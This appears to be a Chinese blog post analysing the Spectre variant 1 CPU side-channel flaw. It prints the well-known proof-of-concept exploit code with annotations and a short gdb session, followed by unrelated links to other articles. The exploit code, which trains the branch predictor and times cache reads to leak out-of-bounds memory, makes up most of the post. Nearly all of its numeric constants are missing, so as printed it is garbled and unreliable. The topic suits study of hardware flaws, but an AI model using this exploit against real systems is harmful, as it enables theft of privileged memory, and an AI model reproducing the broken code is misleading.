下面一句话转自360:

现代处理器(CPU)的运作机制中存在两个用于加速执行的特性,推测执行( Speculative Execution)和间接分支预测(Indirect Branch Prediction)。

表面上看,处理器是依次顺序执行既定的处理器指令。但是,现代处理器为了更好利用处理器资源,已经开始启用并行执行,这个技术已经应用了20年左右 (1995 年开始)。假设,基于猜测或概率的角度,在当前的指令或分支还未执行完成前就开始执行可能会被执行的指令或分支,会发生什么?如果猜对了,直接使用, CPU 执行加速了。如果猜测不正确,则取消操作并恢复到原来的现场(寄存器,内存等),结果会被忽略。整个过程并不会比没有猜测的时候慢,即 CPU的推测执行( Speculative Execution )技术。

不幸的是,尽管架构状态被回滚了,仍然有些副作用,比如TLB或缓存状态并没有被回滚。这些副作用随后可以被黑客通过旁道攻击 (Side Channel Attack) 的方式获取到缓存的内容。如果攻击者能触发推测执行去访问指定的敏感数据区域的话,就可能可以读取到更高特权级的敏感数据。

此漏洞是cpu架构问题(即cache不检查权限)。不是具体软件或者硬件漏洞,因而具有广泛的影响。

下面本文对幽灵代码进行分析。

 #include <stdio.h>

 #include <stdlib.h>

 #include <stdint.h>

 #ifdef _MSC_VER

 #include <intrin.h> /* for rdtscp and clflush */

 #pragma optimize("gt", on)

 #else

 #include <x86intrin.h> /* for rdtscp and clflush */

 #endif

 /********************************************************************

  Victim code.

  ********************************************************************/

 unsigned int array1_size = ; //

 uint8_t unused1[];//uint8_t不是int类型,是char类型:typedef unsigned char   uint8_t;  int8_t才是typedef signed   char   int8_t;      //有符号8位数 

 uint8_t array1[] = {, , , , , , , , , , , , , , , }; //从该数值进行越界读

 uint8_t unused2[];

 uint8_t array2[ * ]; //通过读取该数组某个值来获取读取速度,从而判断某个内存页面是否加载,从而获取到数组的索引值,即array1的越界值。k=array1[x]。

 char *secret = "The Magic Words are Squeamish Ossifrage.";

 uint8_t temp = ; /* Used so compiler won’t optimize out victim_function()即防止指令被优化 */

 void victim_function(size_t x)

 {

     if (x < array1_size)

     {

         temp &= array2[array1[x] * ]; //漏洞点:分支的判断。当array1_size没有从cache获取,同时几次训练都会读取array1[x],当传入恶意索引x时,也会读取,从而越界。

     }

 }

 /********************************************************************

  Analysis code

  ********************************************************************/

 #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

 /* Report best guess in value[0] and runner-up in value[1] */

 void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])

 {

     static int results[]; //对索引命中次数计算

     int tries, i, j, k, mix_i, junk = ;

     size_t training_x, x;

     register uint64_t time1, time2;

     volatile uint8_t *addr;

     for (i = ; i < ; i++)

         results[i] = ;                   //结果清0

     for (tries = ; tries > ; tries--) /*反复读取恶意地址的值,获取最高和次高概率的索引。*/

     {

         /* Flush array2[256*(0..255)] from cache */

         for (i = ; i < ; i++)

             _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction 将所有array2所有页面清空*/

         /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) 5个训练:1次攻击 */

         training_x = tries % array1_size; //%16,training_x为正常访问

         for (j = ; j >= ; j--)

         {

             _mm_clflush(&array1_size);

             for (volatile int z = ; z < ; z++)

             {

             } /* Delay (can also mfence) */

             /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 ,每6次有一次为恶意访问*/

             /* Avoid jumps in case those tip off the branch predictor */

             x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

             x = (x | (x >> ));         /* Set x=-1 if j&6=0, else x=0 */

             x = training_x ^ (x & (malicious_x ^ training_x));

             /* Call the victim! */

             victim_function(x);

         }

         /* Time reads. Order is lightly mixed up to prevent stride prediction */

         for (i = ; i < ; i++)

         {

             mix_i = ((i * ) + ) & ;

             addr = &array2[mix_i * ];

             time1 = __rdtscp(&junk);         /* READ TIMER */

             junk = *addr;                    /* MEMORY ACCESS TO TIME */

             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

                 results[mix_i]++; /* cache hit - add +1 to score for this value 缓存中有该数组值对应的页面,则对应的数组索引分数+1*/

         }

         /* Locate highest & second-highest results results tallies in j/k,获取最高和次高分数的索引*/

         j = k = -;

         for (i = ; i < ; i++)

         {

             if (j <  || results[i] >= results[j])

             {

                 k = j;

                 j = i;

             }

             else if (k <  || results[i] >= results[k])

             {

                 k = i;

             }

         }

         if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))

             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

     }

     results[] ^= junk; /* use junk so code above won’t get optimized out*/

     value[] = (uint8_t)j;

     score[] = results[j];

     value[] = (uint8_t)k;

     score[] = results[k];

 }

 int main(int argc, const char **argv)

 {

     size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
      printf("secret_addr:%p,array1_addr:%p.\n",(void *)secret,(void *)array1);

     int i, score[], len = ;

     uint8_t value[];

     for (i = ; i < sizeof(array2); i++)

         array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */

     if (argc == )

     {

         sscanf(argv[], "%p", (void **)(&malicious_x));

         malicious_x -= (size_t)array1; /* Convert input value into a pointer */

         sscanf(argv[], "%d", &len);

     }

     printf("Reading %d bytes:\n", len);

     while (--len >= )

     {

         printf("Reading at malicious_x = %p... ", (void *)malicious_x);

         readMemoryByte(malicious_x++, value, score);

         printf("%s: ", (score[] >=  * score[] ? "Success" : "Unclear"));//判断标准

         printf("0x%02X=’%c’ score=%d ", value[],(value[] >  && value[] <  ? value[] : ’?’), score[]);

         if (score[] > )

         printf("(second best: 0x%02X score=%d)", value[], score[]);

     }

 }

实际调试:

secret_addr:0x400d18,array1_addr:0x6020a0.

gdb-peda$ x/8s 0x400d18
0x400d18: "The Magic Words are Squeamish Ossifrage."

gdb-peda$ x/8xw 0x6020a0
0x6020a0 <array1>: 0x04030201 0x08070605 0x0c0b0a09 0x100f0e0d

gdb-peda$ p malicious_x
$2 = 0xffffffffffdfec78//显然是负数,所以后面打印的是相对地址,不是绝对地址。

spectre漏洞代码分析-c代码的更多相关文章

  1. 常用 Java 静态代码分析工具的分析与比较

    常用 Java 静态代码分析工具的分析与比较 简介: 本文首先介绍了静态代码分析的基 本概念及主要技术,随后分别介绍了现有 4 种主流 Java 静态代码分析工具 (Checkstyle,FindBu ...

  2. [转载] 常用 Java 静态代码分析工具的分析与比较

    转载自http://www.oschina.net/question/129540_23043 简介: 本文首先介绍了静态代码分析的基本概念及主要技术,随后分别介绍了现有 4 种主流 Java 静态代 ...

  3. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  4. Thrift 代码分析

    Thrift的基本结束 Thrift是一个跨语言的服务部署框架,最初由Facebook于2007年开发,2008年进入Apache开源项目.Thrift通过IDL(Interface Definiti ...

  5. 【转载】常用 Java 静态代码分析工具的分析与比较

    摘自:http://www.oschina.net/question/129540_23043常用 Java 静态代码分析工具的分析与比较 简介: 本文首先介绍了静态代码分析的基本概念及主要技术,随后 ...

  6. java代码分析及分析工具

    一个项目从搭建开始,开发的初期往往思路比较清晰,代码也比较清晰.随着时间的推移,业务越来越复杂.代码也就面临着耦合,冗余,甚至杂乱,到最后谁都不敢碰. 作为一个互联网电子商务网站的业务支撑系统,业务复 ...

  7. GCN代码分析 2019.03.12 22:34:54字数 560阅读 5714 本文主要对GCN源码进行分析。

    GCN代码分析   1 代码结构 . ├── data // 图数据 ├── inits // 初始化的一些公用函数 ├── layers // GCN层的定义 ├── metrics // 评测指标 ...

  8. 常用Java静态代码分析工具的分析与比较

    给国产静态代码检测工具Pinpoint打Call! 简介 本文首先介绍了静态代码分析的基本概念及主要技术,随后分别介绍了4种现有的主流Java静态代码分析工具 (Checkstyle,FindBugs ...

  9. ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析

    攻击代码网址:http://www.exploit-db.com/exploits/394/ 1.执行环境: 1.ProFTPD 1.3.0/1.3.0a 2.编译ProFTPD时.--enable- ...

随机推荐

  1. 「Python」_init_理解与学习

    Python是面向对象的编程语言,因此我从Class.Instance以及属性(property/attribute)的角度出发解释. _init_根据其英文意思(initialize),用来初始化一 ...

  2. packet32 -- 打印packet32捕获的包

    void PrintPackets(LPPACKET lpPacket) { ULONG i, j, ulLines, ulen, ulBytesReceived; char *pChar, *pLi ...

  3. Java的三大特性之封装

    java提高篇(一)-----理解java的三大特性之封装 三大特性之---封装 封装从字面上来理解就是包装的意思,专业点就是信息隐藏,是指利用抽象数据类型将数据和基于数据的操作封装在一起,使其构成一 ...

  4. [洛谷P3228] [HNOI2013]数列

    洛谷题目链接:[HNOI2013]数列 题目描述 小T最近在学着买股票,他得到内部消息:F公司的股票将会疯涨.股票每天的价格已知是正整数,并且由于客观上的原因,最多只能为N.在疯涨的K天中小T观察到: ...

  5. Java学习遇到的问题

    一. Java中泛型如何比较大小,继承Comparable类,然后实现其唯一的方法compareTo(): public class GenericClass<E extends Compara ...

  6. 【洛谷 P3705】 [SDOI2017]新生舞会(费用流,01分数规划)

    题目链接 看到这题我想到了以前做过的一题,名字记不清了,反正里面有"矩阵"二字,然后是道二分图匹配的题. 经典的行列连边网络流. 第\(i\)行和第\(j\)列连边,费用为\(b[ ...

  7. 爬虫--PyQuery

    什么是PyQuery? PyQuery 初始化 字符串初始化 from pyquery import PyQuery as pq html=""" <div> ...

  8. Caffe提取任意层特征并进行可视化

    现在Caffe的Matlab接口 (matcaffe3) 和python接口都非常强大, 可以直接提取任意层的feature map以及parameters, 所以本文仅仅作为参考, 更多最新的信息请 ...

  9. php审计学习:xdcms2.0.8注入

    注入点Fields: 注册页面会引用如下方法: $fields 变量是从 $fields=$_POST['fields']; 这里获取, 在代码里没有过滤. 打印 fields 数据查看: 从代码上看 ...

  10. i8042 键盘控制器-------详细介绍

    [转]http://shanzy.bokee.com/834368.html ps/2 键盘硬件概述 对于驱动来说,和键盘相关的最重要的硬件是两个芯片.一个是 intel 8042 芯片,位于主板上, ...